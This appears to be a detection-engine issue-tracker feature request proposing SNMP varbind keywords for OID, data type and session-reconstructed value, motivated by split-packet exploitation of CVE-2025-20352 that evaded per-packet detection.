Project

General

Profile

Actions

Feature #8691

open
SD OD

detect: SNMP Varbind Keywords

Feature #8691: detect: SNMP Varbind Keywords

Added by Stuart DC 4 days ago. Updated 1 day ago.

Status:
Triaged
Priority:
Normal
Assignee:
Target version:
Effort:
Difficulty:
Label:

Description

In recent exploitation of CVE-2025-20352, it would have been ideal to alert on shell metachars in a reconstructed SNMP value across a session, but since the commands were split across multiple SNMP packets, each carrying small payloads this made the attempt to detection near impossible without major performance implications.

SNMP can carry multiple varbinds in a single request. Each varbind appears as a triplet:
  • snmp.oid - (sticky buffer) keyword to match exactly or a prefix (subtree) OID
  • snmp.data_type - (e.g int32 - "2", octet string - "Cisco IOS Software, Catalyst 4500", counter32/64 - "41239842", time ticks - "1452300", ip address - "192.168.1.50", null - "0x0500")
  • snmp.value - (sticky buffer) decoded [full] value across a session
Actions

Also available in: PDF Atom